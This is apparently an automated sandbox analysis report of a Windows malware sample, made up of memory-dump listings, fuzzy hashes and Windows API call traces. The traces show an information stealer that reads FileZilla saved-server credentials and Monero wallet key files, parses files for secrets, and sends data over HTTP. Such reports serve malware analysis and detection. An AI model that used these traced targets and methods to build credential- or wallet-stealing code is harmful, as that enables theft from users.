                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac82f76ad6db31649e8c6c4965542ed40f064bb99d2d7d9443dded5ed1ebd24f
                                    • Instruction ID: b3e7896a01155956103d4726134fd49dca717eb61d089ac2064ede3a67bef3cb
                                    • Opcode Fuzzy Hash: ac82f76ad6db31649e8c6c4965542ed40f064bb99d2d7d9443dded5ed1ebd24f
                                    • Instruction Fuzzy Hash: A83128F790C6089BD7006E29DC8073AFEEEEB94228F26462AE9D5E3B10D1755C0186D3
                                    Function 013F0521 Relevance: .1, Instructions: 98COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 46ef6e441e1e9d310ea3f8e456257ab5871483ac03b62047433107fa46d1ca50
                                    • Instruction ID: bd959919f4ccfdcaa1be3a8c6646ff35550a531f67e2829ba713eced9cb32286
                                    • Opcode Fuzzy Hash: 46ef6e441e1e9d310ea3f8e456257ab5871483ac03b62047433107fa46d1ca50
                                    • Instruction Fuzzy Hash: 3E3176F250C304AFE309BF29D88276AFBE5EF98310F16482CE2C583600E635A4508A87
                                    Function 00FB9750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00FB0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00FC0DBA,00FC0DB7,00FC0DB6,00FC0DB3), ref: 00FB0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FB0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FB03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00FB0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FB0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FB0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00FB0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00FB0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB0593
                                    • lstrcat.KERNEL32(?,00FC1678), ref: 00FB05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB05B5
                                    • lstrcat.KERNEL32(?,00FC167C), ref: 00FB05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00FB05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB05E6
                                    • lstrcat.KERNEL32(?,00FC1688), ref: 00FB05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00FB0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB0617
                                    • lstrcat.KERNEL32(?,00FC1698), ref: 00FB0626
                                    • lstrcat.KERNEL32(?,00FC169C), ref: 00FB0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC0DB2), ref: 00FB068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 561a5d22d56efa85be2e71871e3f5f3d3c2d96d4a48d1a9c254d3ac163471def
                                    • Instruction ID: 19a5c98490496c6879688bd5f33b02ef09c4ca10e7500019ccd5e6fdb7ea1d8d
                                    • Opcode Fuzzy Hash: 561a5d22d56efa85be2e71871e3f5f3d3c2d96d4a48d1a9c254d3ac163471def
                                    • Instruction Fuzzy Hash: B8D12B71900208ABCB14EBE1DD96EEE7778FF54301F544428F112A7085EE78EA56EF61
                                    Function 00FA5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FA59F8
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008CE9F8,00000000,?,008CA940,00000000,?,00FC1A1C), ref: 00FA5E71
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00FA5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FA5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00FA5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FA5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FA5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FBD
                                    • HttpOpenRequestA.WININET(00000000,008CEA38,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA5BF8
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA5FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: df0543b229df85bcadf3ea93e5fd270fed499508605ee03e0ca2d457ae2604ff
                                    • Instruction ID: 0a040d6c85451ae64afe4c23658c21358679b69b0fb39adb14484e727d60426f
                                    • Opcode Fuzzy Hash: df0543b229df85bcadf3ea93e5fd270fed499508605ee03e0ca2d457ae2604ff
                                    • Instruction Fuzzy Hash: 99122171820118BBDB19EBA1DC96FEEB378BF14700F5041A9B10677491EF346A49EF61
                                    Function 00FACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FACF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FAD0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FAD0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD208
                                    • lstrcat.KERNEL32(?,00FC1478), ref: 00FAD217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD22A
                                    • lstrcat.KERNEL32(?,00FC147C), ref: 00FAD239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD24C
                                    • lstrcat.KERNEL32(?,00FC1480), ref: 00FAD25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD26E
                                    • lstrcat.KERNEL32(?,00FC1484), ref: 00FAD27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD290
                                    • lstrcat.KERNEL32(?,00FC1488), ref: 00FAD29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD2B2
                                    • lstrcat.KERNEL32(?,00FC148C), ref: 00FAD2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FAD2D4
                                    • lstrcat.KERNEL32(?,00FC1490), ref: 00FAD2E3
                                      • Part of subcall function 00FBA820: lstrlen.KERNEL32(00FA4F05,?,?,00FA4F05,00FC0DDE), ref: 00FBA82B
                                      • Part of subcall function 00FBA820: lstrcpy.KERNEL32(00FC0DDE,00000000), ref: 00FBA885
                                    • lstrlen.KERNEL32(?), ref: 00FAD32A
                                    • lstrlen.KERNEL32(?), ref: 00FAD339
                                      • Part of subcall function 00FBAA70: StrCmpCA.SHLWAPI(008C9170,00FAA7A7,?,00FAA7A7,008C9170), ref: 00FBAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAD3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: bf75de317a80cb1fe2aa5aec927b27300d8f3ab4caf13078d37845c7883d3289
                                    • Instruction ID: 4851e9ad37736658879f102b311ff3e03d5698c07f2209603eff7e8160b96e08
                                    • Opcode Fuzzy Hash: bf75de317a80cb1fe2aa5aec927b27300d8f3ab4caf13078d37845c7883d3289
                                    • Instruction Fuzzy Hash: 2FE15D71910108ABCB18EBE1ED96EEE7778BF54301F104068F117B7091DE39AA59EF62
                                    Function 00FAC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008CD498,00000000,?,00FC144C,00000000,?,?), ref: 00FACA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FACA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00FACA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FACAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FACAD9
                                    • StrStrA.SHLWAPI(?,008CD4B0,00FC0B52), ref: 00FACAF7
                                    • StrStrA.SHLWAPI(00000000,008CD3D8), ref: 00FACB1E
                                    • StrStrA.SHLWAPI(?,008CDD60,00000000,?,00FC1458,00000000,?,00000000,00000000,?,008C90E0,00000000,?,00FC1454,00000000,?), ref: 00FACCA2
                                    • StrStrA.SHLWAPI(00000000,008CDB00), ref: 00FACCB9
                                      • Part of subcall function 00FAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FAC871
                                      • Part of subcall function 00FAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FAC87C
                                    • StrStrA.SHLWAPI(?,008CDB00,00000000,?,00FC145C,00000000,?,00000000,008C91F0), ref: 00FACD5A
                                    • StrStrA.SHLWAPI(00000000,008C8FE0), ref: 00FACD71
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B46), ref: 00FAC943
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B47), ref: 00FAC957
                                      • Part of subcall function 00FAC820: lstrcat.KERNEL32(?,00FC0B4E), ref: 00FAC978
                                    • lstrlen.KERNEL32(00000000), ref: 00FACE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00FACE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 50e48f85e149a37368dcc4d6ceb994ea5e09e6983af762bbfed34d05e69fda38
